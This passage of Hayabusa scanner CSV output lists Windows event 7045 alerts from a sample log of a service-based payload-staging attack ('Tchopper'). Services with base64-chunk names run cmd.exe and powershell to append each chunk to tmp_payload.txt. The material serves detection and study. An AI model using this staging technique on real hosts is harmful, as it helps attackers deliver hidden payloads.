start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:51.402 